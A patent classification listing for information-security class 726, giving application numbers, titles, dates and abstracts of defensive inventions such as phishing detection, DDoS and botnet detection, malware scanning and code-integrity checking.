
MONITORING OR SCANNING OF SOFTWARE OR DATA INCLUDING ATTACK PREVENTION

Subclass of:

726 - Information security

Patent class list (only non-empty classes are listed)

Deeper subclasses:

Class | Description | Number of patent applications
726023000 | Intrusion detection | 1037
726025000 | Vulnerability assessment | 360
Entries
DocumentTitleDate
20130031627Method and System for Preventing Phishing Attacks - A method, system and program product for preventing phishing attacks, wherein the method comprises: acquiring links in a Web page; classifying the acquired links according link types; and determining whether a phishing attack exists according to the classified links, wherein the links are classified into two types: internal links belonging to the same domain as the address of the Web page, and external links belonging to a different domain from the address of the Web page. By carrying out the method or system according to the above one or more embodiments of the present disclosure, since it is first detected whether a Web page is a fake website of a phishing attack before displaying the reproduced Web page to the user and the user is warned upon detecting a fake website, unnecessary losses due to phishing attacks can be prevented.01-31-2013
20130031626METHODS OF DETECTING DNS FLOODING ATTACK ACCORDING TO CHARACTERISTICS OF TYPE OF ATTACK TRAFFIC - Disclosed are methods of detecting a domain name server (DNS) flooding attack according to characteristics of a type of attack traffic. A method of detecting an attack by checking a DNS packet transmitted over a network in a computer device connected to the network, includes determining whether the number of DNS packets previously generated within a threshold time with the same type of message, the same specific address and the same field value as in the transmitted packet is greater than or equal to a given number, and determining the transmitted DNS packet as a packet related to the attack if the number of DNS packets previously generated within the threshold time is greater than or equal to the given number.01-31-2013
20130031629Apparatus and Method for Enhancing Security of Data on a Host Computing Device and a Peripheral Device - A method of enhancing security of at least one of a host computing device and a peripheral device coupled to the host computing device through a communication interface. Data is transparently received from the peripheral device or the host computing device, and the received data is stored. The stored data is analyzed to detect a circumstance associated with a security risk. If such a circumstance is not detected, then the data is transparently forwarded to the other of the peripheral device or the host. However, if a circumstance associated with a security risk is detected, then a security process, defined by a rule, is performed. Related apparatus are provided, as well as other methods and apparatus.01-31-2013
20130031628Preventing Phishing Attacks - A method, system and program product for preventing phishing attacks, wherein the method comprises: acquiring links in a Web page; classifying the acquired links according link types; and determining whether a phishing attack exists according to the classified links, wherein the links are classified into two types: internal links belonging to the same domain as the address of the Web page, and external links belonging to a different domain from the address of the Web page. By carrying out the method or system according to the above one or more embodiments of the present disclosure, since it is first detected whether a Web page is a fake website of a phishing attack before displaying the reproduced Web page to the user and the user is warned upon detecting a fake website, unnecessary losses due to phishing attacks can be prevented.01-31-2013
20130031625CYBER THREAT PRIOR PREDICTION APPARATUS AND METHOD - Disclosed are a cyber threat prior prediction apparatus, including a DNS based C&C server detecting unit configured to analyze DNS traffic to extract a domain address which is suspected as a C&C server; a network based abnormality detecting unit configured to analyze the network traffic to detect IP addresses of zombie PCs which access the C&C server and information of the zombie PCs; and a cyber threat predicting unit configured to predict a cyber threat situation based on the information of the zombie PCs.01-31-2013
20130031630Method and Apparatus for Identifying Phishing Websites in Network Traffic Using Generated Regular Expressions - According to an aspect of this invention, a method to detect phishing URLs involves: creating a whitelist of URLs using a first regular expression; creating a blacklist of URLs using a second regular expression; comparing a URL to the whitelist; and if the URL is not on the whitelist, comparing the URL to the blacklist. False negatives and positives may be avoided by classifying Internet domain names for the target organization as “legitimate”. This classification leaves a filtered set of URLs with unknown domain names which may be more closely examined to detect a potential phishing URL. Valid domain names may be classified without end-user participation.01-31-2013
20090064330METHODS AND SYSTEMS FOR ANALYZING DATA RELATED TO POSSIBLE ONLINE FRAUD - Various embodiments of the invention provide methods, systems and software for analyzing data. In particular embodiments, for example, a set of data about a web site may be analyzed to determine whether the web site is likely to be illegitimate (e.g., to be involved in a fraudulent scheme, such as a phishing scheme, the sale of gray market goods, etc.). In an exemplary embodiment, a set of data may be divided into a plurality of components (each of which, in some cases, may be considered a separate data set). Merely by way of example, a set of data may comprise data gathered from a plurality of data sources, and/or each component may comprise data gathered from one of the plurality of data sources. As another example, a set of data may comprise a document with a plurality of sections, and each component may comprise one of the plurality of sections. Those skilled in the art will appreciate that the analysis of a particular component may comprise certain tests and/or evaluations, and that the analysis of another component may comprise different tests and/or evaluations. In other cases, the analysis of each component may comprise similar tests and/or evaluations. The variety of tests and/or evaluations generally will be implementation specific.03-05-2009
20090193522COMPUTER RESOURCE VERIFYING METHOD AND COMPUTER RESOURCE VERIFYING PROGRAM - A computer resource verifying method verifies computer resources introduced into a client device. The computer resource verifying method includes performing, by the client device, client side processing including verification of individual computer resources introduced into the client device and information collection for a dependence relation between computer resources; performing, by a server device, a server side processing by receiving information on a result of the client side processing performed in the performing of the client side processing to perform verification of the dependence relation between computer resources; and determining, by the server device, whether the client device is normal based on a verification result of the computer resources and a verification result of the dependence relation between computer resources.07-30-2009
20090193521ELECTRONIC DEVICE, UPDATE SERVER DEVICE, KEY UPDATE DEVICE - The present invention offers an electronic device that reduces the amount of data for communication required when files pertaining to software are to be updated, as compared to the conventional devices, and performs tamper detection. The present invention is an electronic device having an application file pertaining to an operation of application software and updating the application file via a network. The electronic device (i) stores therein the application file including one or more data pieces, (ii) receives, from an external apparatus via the network, update data and location information indicating a location, within the application file, which is for rewrite with the update data, (iii) rewrites only part of the application file by writing over a data piece present at the indicated location with the update data, to update the application file, and (iv) examines whether the updated application file has been tampered with.07-30-2009
20110289582METHOD FOR DETECTING MALICIOUS JAVASCRIPT - An apparatus and system for scoring and grading websites and method of operation. An apparatus receives one or more Uniform Resource Identifiers (URI), requests and receives a resource such as a webpage, and observes the behaviors of an enhanced browser emulator as controlled by javascript provided by the webpage. The enhanced browser emulator tracks behaviors which when aggregated imply malicious intent.11-24-2011
20090013404Distributed defence against DDoS attacks - When the processing resources of a host system are occupied beyond a trigger point by incoming requests, that host system issues a cool-it message that is broadcast throughout the network, eventually reaching edge routers that, in response to the message, throttle the traffic that they pass into the network. The throttling is applied in increasing amounts with increasing traffic volumes received at the edge routers. The cool-it messages are authenticated to ensure that they are not being used as instruments of a DoS attack. This mechanism also works to control legitimate network congestion, and it does not block users from a host system that is under attack.01-08-2009
20110202997METHOD AND SYSTEM FOR DETECTING AND REDUCING BOTNET ACTIVITY - A method and system for detecting and reducing botnet activity includes tracking the number of connections to a destination address over predetermined periods of time. A persistence value is assigned to the destination address based on the number of time periods during which the destination address was connected. The persistence value is compared to a threshold value and an alert is generated if the persistence value is greater than the threshold value. Known safe destinations may be entered into a whitelist.08-18-2011
20110202996Method and apparatus for verifying the integrity of software code during execution and apparatus for generating such software code - Self-modifying software code comprising a number of modules that each may be modified to be in a plurality of states during execution. In order to verify the integrity of such code, the different states of the code are calculated. For each state a checksum, e.g. a hash value, is generated for at least part of the code. During execution the state of the code is changed, modifying a module, and an integrity check is performed using the checksum for the state of the code. The checksum may be stored in a look-up table or it may be embedded in the integrity verification function. A state variable indicating the state of the modules may be used to look-up the checksum in the table. Possible states of a module is encrypted and decrypted. Also provided is an apparatus for generating protected software code.08-18-2011
20120180128Preventing Cross-Site Request Forgery Attacks on a Server - Preventing Cross-Site Request Forgery security attacks on a server in a client-server environment. In one aspect, this comprises embedding a nonce and a script in all responses from the server to the client wherein, when executed, the script adds the nonce to each request from the client to the server; sending the response with the nonce and the script to the client; and verifying that each request from the client includes the nonce sent by the server to the client. The script preferably modifies all objects, including dynamically generated objects, in a server response that may generate future requests to the server to add the nonce to the requests. The server verifies the nonce value in a request and optionally confirms the request with the client if the value differs from the value previously sent. Server-side aspects might be embodied in the server or a proxy.07-12-2012
20080256633Method and Apparatus for Determination of the Non-Replicative Behavior of a Malicious Program - Disclosed is a method, a computer system and a computer readable media product that contains a set of computer executable software instructions for directing the computer system to execute a process for determining a non-replicative behavior of a program that is suspected of containing an undesirable software entity. The process causes execution of the program in at least one known environment and automatically examines the at least one known environment to detect if a change has occurred in the environment as a result of the execution of the program. If a change is detected, the process automatically analyzes the detected change (i.e., the process performs a side effects analysis) to determine if the change resulted from execution of the program or from execution of the undesirable software entity. The process then uses the result of the analysis at least for undoing a detected change that results from execution of the undesirable software entity. The result of the analysis can also be used for informing a user of an anti-virus system of the non-replicative changes made to the environment.10-16-2008
20080256631RENEWABLE INTEGRITY ROOTED SYSTEM - A method of validating software is disclosed. The method may include receiving, at a first function, a first hash and a first version. The first function may validate a second function according to the first hash and first version. The second function may receive a second hash and a second version, and the second function may validate a third function according to the second hash and second version. The first version and first hash may be stored within the first function, for example. The first version and first hash may be stored within a manifest, for example.10-16-2008
20120246723WINDOWS KERNEL ALTERATION SEARCHING METHOD - The present invention relates to a method of detecting the alteration of the driver of a windows kernel and a system using system module information that is the unalterable information of the windows kernel.09-27-2012
20120246721METHOD AND APPARATUS FOR DETERMINING SOFTWARE TRUSTWORTHINESS - Aspects of the invention relate to a method, apparatus, and computer readable medium for determining software trustworthiness. In some examples, a software package identified as including at least one file of unknown trustworthiness is installed on a clean machine. A report package including a catalog of files that have been installed or modified on the clean machine by the software package is generated. Identification attributes for each of the files in the catalog is determined. Each of the files in the catalog is processed to assign a level of trustworthiness thereto. The report package is provided as output.09-27-2012
20120246720USING SOCIAL GRAPHS TO COMBAT MALICIOUS ATTACKS - Detection of user accounts associated with spammer attacks may be performed by constructing a social graph of email users. Biggest connected components (BCC) of the social graph may be used to identify legitimate user accounts, as the majority of the users in the biggest connected components are legitimate users. BCC users may be used to identify more legitimate users. Using degree-based detection techniques and PageRank based detection techniques, the hijacked user accounts and spammer user accounts may be identified. The users' email sending and receiving behaviors may also be examined, and the subgraph structure may be used to detect stealthy attackers. From the social graph analysis, legitimate user accounts, malicious user accounts, and compromised user accounts can be identified.09-27-2012
20120246719SYSTEMS AND METHODS FOR AUTOMATIC DETECTION OF NON-COMPLIANT CONTENT IN USER ACTIONS - Described herein are methods, systems, apparatuses and products for automatic detection of non-compliant content in user actions. An aspect provides a method including, responsive to receiving a user selection to share data via an electronic device, analyzing the data to be shared; and automatically identifying non-compliant content within the data prior to sharing the data. Other embodiments are disclosed.09-27-2012
20130086676CONTEXT-SENSITIVE TAINT ANALYSIS - In one implementation, a taint processing applied to a tainted value of an application is identified and an output context of the application associated with output of the tainted value is determined. A notification is generated if the taint processing is incompatible with the output context.04-04-2013
20100115616Storage Device and Method for Dynamic Content Tracing - A storage device and method for dynamic content tracing are provided. In one embodiment, a storage device stores content having a plurality of sequences of data, each sequence of data having original data and at least one variation of the original data. The storage device receives an identifier of a host device and, for each sequence of data, selects either the original data or one of the at least one variation of the original data based on the identifier of the host device. The storage device then assembles a version of the content from the selections and provides the assembled version of the content to the host device. The assembled version of the content is unique to the host device and therefore can be used to trace the assembled version of the content back to the host device.05-06-2010
20100115612Context-Based User Authentication, Workflow Processing, and Data Management in a Centralized Application in Communication with a Plurality of Third-Party Applications - Described are computer-based methods and apparatuses, including computer program products, for providing context-based user authentication, workflow processing and data management in a centralized application in communication with a plurality of third-party applications. Changed data from a first third-party application is received by a centralized application. The changed data is processed by the centralized application. The processing comprises determining an urgency type, a second third-party application to which at least a portion of the data is applicable, mapping the data to a second third-party application data structure, and generating a request including the data structure and based on the urgency type and the second third-party application. The request is sent to the second third-party application. Data in a database associated with the centralized application is updated based on the changed data.05-06-2010
20090055927Networked Computer System with Reduced Vulnerability to Directed Attacks - An attacker is prevented from obtaining information about the configuration of a computer system. Each of one or more revealing content elements that may be found in outgoing data transmitted by the computer system and that are capable of being used by the attacker to obtain the information about the configuration of the computer system is associated with one or more respective replacement content elements. Outgoing data to be transmitted by the computer system are then scanned for these one or more revealing content elements. A revealing content element found in the outgoing data is replaced by a replacement content element from the one or more replacement content elements associated with that revealing content element. This is done before the outgoing data is transmitted.02-26-2009
20130086678INTEGRATING SECURITY PROTECTION TOOLS WITH COMPUTER DEVICE INTEGRITY AND PRIVACY POLICY - At computer device power on, the operating system of the computer device initiates a monitor. The monitor assigns a monitoring program to each program and object (collectively, “program”) running on the computer device to monitor the activities of the program. When the monitoring program is assigned to a program, the monitoring program is assigned an integrity and/or privacy label (collectively, “integrity label”) based on predetermined criteria applied to the monitored program. The monitoring program, in turn, assigns an integrity label to the program monitored by the monitoring program. The integrity label assigned to the monitored program is less than or equal to the integrity label of the monitoring program. The monitor enforces an integrity policy of the computer device based on the integrity label assigned to monitored programs and the integrity label associated with data, another program, or a remote network resource that the monitored program is seeking to access.04-04-2013
20130086677METHOD AND DEVICE FOR DETECTING PHISHING WEB PAGE - The embodiments of the present invention provide a method and a device for detecting a phishing web page. The method includes: judging whether a unique domain name corresponding to a to-be-detected web page exists in a trusted domain name database; if the unique domain name does not exist in the trusted domain name database, determining a similarity between a content characteristic extracted from the to-be-detected web page and a content characteristic of each template file in a template file database; and determining that the to-be-detected web page is a phishing web page if the similarity between the content characteristic extracted from the to-be-detected web page and a content characteristic of at least one template file is greater than a preset similarity threshold. In the embodiments of the present invention, accuracy of a result of detecting a phishing web page is improved.04-04-2013
20130086679Responses To Server Challenges Included In A Hypertext Transfer Protocol Header - Example embodiments relate to verification of client requests based on a response to a challenge (04-04-2013
20130081134Instruction set adapted for security risk monitoring - A processor is adapted to manage security risk by updating and monitoring a taint storage element in response to receipt of taint indicators, and responding to predetermined taint conditions detecting by the monitoring. The processor can be operable to execute instructions of a defined instruction set architecture and comprises an instruction of the instruction set architecture operable to access data from a source and operable to receive a taint indicator indicative of potential security risk associated with the data. The processor can further comprise a taint storage element operable for updating in response to receipt of the taint indicator and logic. The logic can be operable to update the taint storage element, process the taint storage element, determine a security risk condition based on the processing of the taint storage element, and respond to the security risk condition.03-28-2013
20130036466INTERNET INFRASTRUCTURE REPUTATION - One or more techniques and/or systems are provided for internet connectivity protection. In particular, reputational information assigned to infrastructure components (e.g., IP addresses, name servers, domains, etc.) may be leveraged to determine whether an infrastructure component associated with a user navigating to content of a URL is malicious or safe. For example, infrastructure component data associated with a web browser navigating to a website of a URL may be collected and sent to a reputation server. The reputation server may return reputation information associated with the infrastructure component data (e.g., an IP address may be known as malicious even though the URL may not yet have a reputation). In this way, the user may be provided with notifications, such as warnings, when various unsafe conditions arise, such as interacting with an infrastructure component with a bad reputation, a resolved IP address not matching the URL, etc.02-07-2013
20130036464Processor operable to ensure code integrity - A processor can be used to ensure that program code can only be used for a designed purpose and not exploited by malware. Embodiments of an illustrative processor can comprise logic operable to execute a program instruction and to distinguish whether the program instruction is a legitimate branch instruction or a non-legitimate branch instruction.02-07-2013
20130036467METHOD AND PROCESS FOR PIN ENTRY IN A CONSISTENT SOFTWARE STACK IN CASH MACHINES - Method for checking the consistency of control software of a controller of a self-service automat having a trustworthy domain (02-07-2013
20130081136METHOD AND DEVICE FOR DETECTING FLOOD ATTACKS - Disclosed is a flood attack detection method, wherein the total number of keywords of a source packet is acquired, and the number of feature parameters corresponding to the source packet is acquired. A ratio of the number of feature parameters to the total number of keywords is compared with a preset threshold, and if the ratio is greater than or equal to the preset threshold, it is determined that a flood attack occurs.03-28-2013
20130081135INJECTION ATTACK MITIGATION USING CONTEXT SENSITIVE ENCODING OF INJECTED INPUT - A method for preventing malicious code being embedded within a scripting language of a web application accessed by a web browser (03-28-2013
20080263658USING ANTIMALWARE TECHNOLOGIES TO PERFORM OFFLINE SCANNING OF VIRTUAL MACHINE IMAGES - Methods and systems for scanning a virtual machine image. The virtual machine image may be stored as a collection of one or more virtual hard disk files. The virtual machine image may be stored by taking the virtual machine off-line or may be stored by taking a checkpoint of the virtual machine while the virtual machine is on-line. The virtual machine image is rendered to file-system data. Rendering the virtual machine image to file-system data may comprise mounting the virtual machine image's virtual hard disk drives. An anti-malware engine is invoked to scan the exposed file-system data, and data indicative of the scanning may be stored.10-23-2008
20120210422METHOD AND APPARATUS FOR DETECTING MALICIOUS SOFTWARE USING GENERIC SIGNATURES - Novel methods, components, and systems for automatically detecting malicious software are presented. More specifically, we describe methods, components, and systems for the automated deployment of generic signatures to detect malicious software. (Typically, generic signature creation and deployment require more extensive manual processes.) The disclosed invention provides a significant improvement with regard to automation compared to previous approaches.08-16-2012
20090138969DEVICE AND METHOD FOR BLOCKING AUTORUN OF MALICIOUS CODE - A device and method for blocking autorun of a malicious code through an autorun file stored in a removable storage device are provided. A device manager monitors a connection of a removable storage device, acquires a global unique identifier of the removable storage device, and deletes an autorun file for running the malicious code from the removable storage. A registry manager determines whether a registry key for storing content of the autorun file is generated using the global unique identifier of the removable storage device and deletes the registry key. The present invention can block autorun of a malicious code stored in the removable storage device by retrieving and deleting a registry key for performing the autorun technique when a removable storage device is connected to a system.05-28-2009
20130042319METHOD AND APPARATUS FOR DETECTING AND DEFENDING AGAINST CC ATTACK - A method for detecting and defending against a CC attack is disclosed, which comprises the following steps of: recording the number of times m of requests for a webpage and the number of times n of related requests for the webpage within a preset time interval if a user's request of accessing the webpage is a dynamic webpage request; and determining that the webpage is subjected to a CC attack if a value (m−n)/m is greater than or equal to a preset threshold. A corresponding apparatus is further disclosed. The method and the apparatus for detecting and defending against a CC attack of the present disclosure can accurately detect and defend against the CC attack.02-14-2013
20130042321SECURITY SYSTEMS AND METHODS - Security methods are provided. The method can include comparing a first device identifier (02-14-2013
20130036465Security controller - A security controller has first and second read request paths for performing security checking of read requests received from a master device and for controlling issuing of the read request to a safe device. If the first read request path is selected for an incoming read request then the first read request path controls issuing of the read request in dependence on result of the security checking. If the second read request path is selected, then the incoming read request is issued without waiting for a result of the security checking, and tracking data is stored indicating the result of the security checking. When receiving a response to a read request issued using the second read request path, a response path modifies the response to mask read data if the tracking data stored for the corresponding read request indicates that a security violation occurred.02-07-2013
20130042320SYSTEM, METHOD AND COMPUTER PROGRAM PRODUCT FOR SCANNING PORTIONS OF DATA - A scanning system, method and computer program product are provided. In use, portions of data are scanned. Further, access to a scanned portion of the data is allowed during scanning of another portion of the data.02-14-2013
20100043071SYSTEM AND METHOD FOR COMBATING PHISHING - In one embodiment, the present invention relates to a method and system for combating phishing. A computer receives an email comprising a sender email address and a link. The computer determines a sender domain name from the sender email address and ascertains a Uniform Resource Locator (URL) corresponding to the link. The computer then determines a link domain name from the URL. The computer then determines whether the sender domain name is different than the link domain name, so as to classify the URL as a potential phishing URL.02-18-2010
20130139258DECEPTIVE INDICIA PROFILE GENERATION FROM COMMUNICATIONS INTERACTIONS - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for generating deceptive indicia profiles may implement operations including, but not limited to: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a second communications interaction; generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction; and providing a notification associated with the deceptive indicia profile for the participant to a second participant in a communications interaction with the participant.05-30-2013
20090158429METHODS AND SYSTEMS FOR ENABLING ANALYSIS OF COMMUNICATION CONTENT WHILE PRESERVING CONFIDENTIALITY - Disclosed are methods and systems for enabling analysis of communication content while preserving confidentiality. In one embodiment, communication content is processed to increase the similarity of superficially dissimilar instances of communication content and/or to increase the distinctiveness of superficially similar instances of communications content. In this embodiment at least part of the processed communication content is hashed to obscure the actual communication content. In one embodiment, social network analysis is performed on the communication content after hashing, and visualization of the social network analysis includes thread graphs and/or circular graphs.06-18-2009
20090158428Method and Device for Integrating Multiple Threat Security Services - A method and device for integrating multiple threat security services are disclosed. The method may comprise parsing an incoming packet at a current layer and analyzing the packet with respect to multiple threat security services and so that one or more threat security services needed by the packet may be determined. According to an exemplary embodiment, the current layer may be a layer in a protocol stack constructed based on the multiple threat security services. With this method, integrated multiple threat security services may filter application data and parse network packet data via a single integrated entity, and thus the efficacy of filtering application data may be improved while computation overhead may be reduced.06-18-2009
20090158427SIGNATURE STRING STORAGE MEMORY OPTIMIZING METHOD, SIGNATURE STRING PATTERN MATCHING METHOD, AND SIGNATURE STRING MATCHING ENGINE - Disclosed are a signature string storage memory optimizing method, a signature string pattern matching method, and a signature matching engine. A signature is tokenized in units of substrings and the tokenized substrings are stored in an internal memory block and an external memory block to optimize a memory storage pattern. Therefore, matching of input data to signature patterns is effectively performed.06-18-2009
20090158426TRACEBACK METHOD AND SIGNAL RECEIVING APPARATUS - The present invention provides a traceback method including: receiving data including router information according to a path of an attacker; filtering the data to hash the data, and storing the resultant hashed information; determining whether the data is normally received on the basis of the hashed information; and predicting a path loss on the basis of the determination result. Therefore, it is possible to perform an accurate IP traceback using a probabilistic packet marking method and a hash-based traceback method.06-18-2009
20100107251MIME Handling Security Enforcement - A model restricts un-trusted data/objects from running on a user's machine without permission. The data is received by a protocol layer that reports a MIME type associated with the data, and caches the data and related cache file name (CFN). A MIME sniffer is arranged to identify a sniffed MIME type based on the cached data, the CFN, and the reported MIME type. Reconciliation logic evaluates the sniffed MIME type and the CFN to determine a reconciled MIME type, and to update the CFN. A class ID sniffer evaluates the updated CFN, the cached data, and the reconciled MIME type to determine an appropriate class ID. Security logic evaluates the updated CFN, the reported class ID, and other related system parameters to build a security matrix. Parameters from the security matrix are used to intercept data/objects before an un-trusted data/object can create a security breach on the machine.04-29-2010
20100107250METHOD AND APPARATUS FOR DEFENDING AGAINST ARP SPOOFING ATTACKS - A method and an apparatus for defending against Address Resolution Protocol (ARP) spoofing attacks are disclosed. The method includes: when an ARP entry is updatable, judging whether the MAC address of a received ARP message is the same as the MAC address in the ARP entry, where the ARP message has the same Internet Protocol (IP) address as the ARP entry; if the MAC addresses are different, determining the received ARP message as an ambiguous ARP message and starting an ARP verification process, or else starting no ARP verification. In this way, when no address spoofing attacks occur, no verification messages are generated, thus reducing signaling interactions and saving network resources; besides, spoofing attacks possibly happening at any time are avoided, which effectively prevents address spoofing attacks via random scanning and protects the normal application of the real host.04-29-2010
20100107249Method, Apparatus, and Device for Protecting Against Programming Attacks and/or Data Corruption - The method and accompanying apparatus and device protects against programming attacks and/or data corruption by computer viruses, malicious code, or other types of corruption. In one example, signature verification policy information that identifies a plurality of policies associated with a plurality of target memory segments is programmed during a secure boot process. The programmed signature verification policy information associated with each of the plurality of target memory segments is then evaluated during run-time. Signature verification is then repeatedly performed, during run-time, on each of the plurality of target memory segments based on the programmed signature verification policy information associated with each target memory segment.04-29-2010
20100107248REAL-TIME DATA PROTECTION METHOD AND DATA PROTECTION DEVICE FOR IMPLEMENTING THE SAME - A real-time data protection method includes: receiving input data from an input device; storing the input data; sending the input data to a computing device, thereby permitting the computing device to generate result data based on the input data; receiving the result data from the computing device; generating test data that correspond to the result data; comparing the test data to the input data; and when it is determined that the test data are not identical to the input data, indicating that the result data have been modified. A data protection device that implements the real-time data protection method is also disclosed.04-29-2010
20100107247SYSTEM AND METHOD FOR IDENTIFICATION, PREVENTION AND MANAGEMENT OF WEB-SITES DEFACEMENT ATTACKS - A system and method for identifying websites' defacement attacks by identifying of unauthorized network content pages or parts of pages that are defined as defaced-pages. The application may enable identifying defacing parts of a network content page by comparing the source code of the network content page with the source code of reference defaced-pages, which may be network content pages that were already identified as unauthorized defaced-pages and their source codes have already been stored in at least one database. Once a defacing-page is identified, the system may enable removing of the defacing-page and replacing it with the last corresponding network content page that has preceded the defacing one.04-29-2010
20100107246TERMINAL DEVICE AND METHOD FOR CHECKING A SOFTWARE PROGRAM - A terminal device according to the present invention includes: a first domain configured to execute multiple software programs; and a second domain configured to operate independently of the first domain and to check whether or not the software programs are safe. The second domain includes: an execution sequence storage unit configured to store execution priority of the multiple software programs to be executed by the first domain; a software program checking unit configured to check whether or not the multiple software programs are safe, according to the execution sequence storage unit; and an execution restricting unit configured to restrict the first domain from executing a software program included in the multiple software programs and having a check result indicating that the software program is unsafe, before checking of all the multiple software programs is completed.04-29-2010
20100107245TAMPER-TOLERANT PROGRAMS - Tamper-tolerant programs enable correct and continued execution despite attacks. Programs can be transformed into tamper-tolerant versions that correct effects of tampering in response to detection thereof. Tamper-tolerant programs can execute alone or in conjunction with tamper resistance/prevention mechanisms such as obfuscation and encryption/decryption, among other things. In fact, the same and/or similar mechanisms can be employed to protect tamper tolerance functionality.04-29-2010
20100107244Trust Event Notification and Actions Based on Thresholds and Associated Trust Metadata Scores - An approach is provided for selecting one or more trust factors from trust factors included in a trust index repository. Thresholds are identified corresponding to one or more of the selected trust factors. Actions are identified to perform when the selected trust factors reach the corresponding threshold values. The identified thresholds, identified actions, and selected trust factors are stored in a data store. The selected trust factors are monitored by comparing one or more trust metadata scores with the stored identified thresholds. The stored identified actions that correspond to the selected trust factors are performed when one or more of the trust metadata scores reach the identified thresholds. At least one of the actions includes an event notification that is provided to a trust data consumer.04-29-2010
20080295170PEER-TO-PEER NAME RESOLUTION PROTOCOL (PNRP) SECURITY INFRASTRUCTURE AND METHOD11-27-2008
20090165133SYSTEM FOR EXECUTING PROGRAM USING VIRTUAL MACHINE MONITOR AND METHOD OF CONTROLLING THE SYSTEM - A system for executing a program using a virtual machine monitor and a method of controlling the system are provided. The system includes a virtual machine monitor which divides an operating system (OS) into at least one root domain and a plurality of domains having different trust levels, and a trust-management module which is included in the root domain and periodically measures the trust level of an application program currently being executed in the OS. The virtual machine monitor executes the application program in one of the domains in consideration of the trust level of the application program. The method includes dividing an OS into at least a root domain and a plurality of domains having different trust levels by using a virtual machine monitor, enabling the root domain to periodically measure the trust level of an application program currently being executed in the OS, and executing the application program in one of the domains according to the trust level of the application program.06-25-2009
20120167212METHODS FOR INSPECTING SECURITY CERTIFICATES BY NETWORK SECURITY DEVICES TO DETECT AND PREVENT THE USE OF INVALID CERTIFICATES - Disclosed are methods and media for inspecting security certificates. Methods include the steps of: scanning, by a network security device, messages of a security protocol between a server and a client system; detecting the messages having a security certificate; detecting suspicious security certificates from the messages; and aborting particular sessions of the security protocol associated with the suspicious certificates. Preferably, the step of scanning is performed only on messages of server certificate records. Preferably, the method further includes the step of sending an invalid-certificate notice to the server and the client system. Preferably, the step of detecting the suspicious certificates includes detecting a use of an incorrectly-generated private key for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting an unavailability of revocation information for the certificates. Preferably, the step of detecting the suspicious certificates includes detecting a use of an invalid cryptographic algorithm for the certificates.06-28-2012
20120167211Method and Apparatus to Harden a Software Execution in Random Access Memory - Example embodiments of the present invention relate to a system, apparatus and methods for preserving the integrity of a code to prevent it from being modified, maliciously or inadvertently, while it is in execution in the RAM of a computer platform. This method also may be referred to as code hardening. Code to be hardened in example embodiments of the present invention may be referred to as protected code. Example embodiments of the present invention are able to externally detect unauthorized stoppage of the hypervisor by employing (1) a launch-time metric of the protected code; (2) a run-time metric of the protected code; and (3) a liveliness indicator of the protected code.06-28-2012
20120167205RUNTIME PLATFORM FIRMWARE VERIFICATION - Embodiments of the invention are directed towards logic and/or modules stored in processor secure storage to determine whether a first platform firmware image (e.g., basic input/output system (BIOS), device read-only memory (ROM), manageability engine firmware) loaded onto a processor cache is valid. The processor executes the first platform firmware image if it is determined to be valid. If the first platform image is determined to be invalid, a second platform firmware image is located. If this platform firmware image is determined to be valid, the processor will execute said second platform image.06-28-2012
20120167204ISOLATION TOOL FOR USER ASSISTANCE IN SOLVING A CAPTCHA TEST - A method includes displaying a CAPTCHA test comprising an image with distorted alphanumeric characters. The method also includes associating a mask with the image that maps the alphanumeric characters to coordinates. Further, the method includes, enhancing a portion of the image corresponding to one of the alphanumeric characters responsive to a user positioning an assistance tool proximate to one alphanumeric character to reduce distortion.06-28-2012
20130047253METHOD AND APPARATUS FOR TOKEN-BASED REAL-TIME RISK UPDATING - According to one embodiment, an apparatus may store a plurality of tokens indicating a user is accessing a resource over a network. The plurality of tokens may include a risk token indicating a risk associated with access by the user to the resource. The apparatus may detect a token indicating a change associated with accessing the resource, and determine that the change triggers a risk update. The apparatus may then generate a dataset token that represents the risk token and the token indicating the change, and communicate the dataset token to a token provider to perform the risk update. The apparatus may then receive a recomputed risk token representing an updated risk. The updated risk may indicate the risk associated with continuing access to the resource with the change.02-21-2013
20130047254METHOD AND APPARATUS FOR TOKEN-BASED TRANSACTION TAGGING - According to one embodiment, an apparatus may monitor a session that facilitates the processing of a transaction. The transaction may represent an action taken against a resource during the session. The apparatus may determine that the transaction qualifies for additional monitoring, and in response, generate a tag. The tag may be unique to the transaction. The apparatus may then associate the tag with the transaction to facilitate tracing of the transaction. The apparatus may then trace the transaction during the processing of the transaction by following the tag, and communicate a message to transfer the transaction to an isolated processing unit. The isolated processing unit processes the transaction in isolation.02-21-2013
20090064326METHOD AND A SYSTEM FOR ADVANCED CONTENT SECURITY IN COMPUTER NETWORKS - The present invention relates to a method and a system for protecting data in a computer network. A device is placed on a network edge in such a way, that all outgoing data has to pass through it. Separately, a set of data that is not allowed to leave the network is defined and stored in a secure form (typically, one way hash). The device determines the network protocol, file type, transforms and normalizes the passing data, and seeks the presence of the data from the defined set. If a threshold amount of the protected data is present, the device takes one of the following actions: block, alert, log, redact, store, redirect, encrypt, notify sender.03-05-2009
20090044271INPUT AND OUTPUT VALIDATION - The present description refers in particular to a computer-implemented method, a computer system, and a computer program product for input validation and output validation to prevent SQL injections. In one aspect, an embodiment of the invention involves a service (e.g., a web service operating on a server) receiving a request message from a client over a network. The server includes a handler for checking the request message according to a first method, prior to sending the request message to the service. In addition, the handler checks a response message (from the service) according to the first method, prior to sending the response message to the client.02-12-2009
20090044270NETWORK ELEMENT AND AN INFRASTRUCTURE FOR A NETWORK RISK MANAGEMENT SYSTEM - A system for a communication infrastructure in a network including at least one connected system (CS) and at least one network risk management network element (SW), wherein the network acts as a virtual network comprising at least one virtual network element, and wherein the at least one virtual network element takes over the roles of existing network elements comprising at least one of a switch, a router, a firewall and an intrusion prevention system (IPS), and wherein the virtual network is comprised of physical elements that work together to form the network's infrastructure.02-12-2009
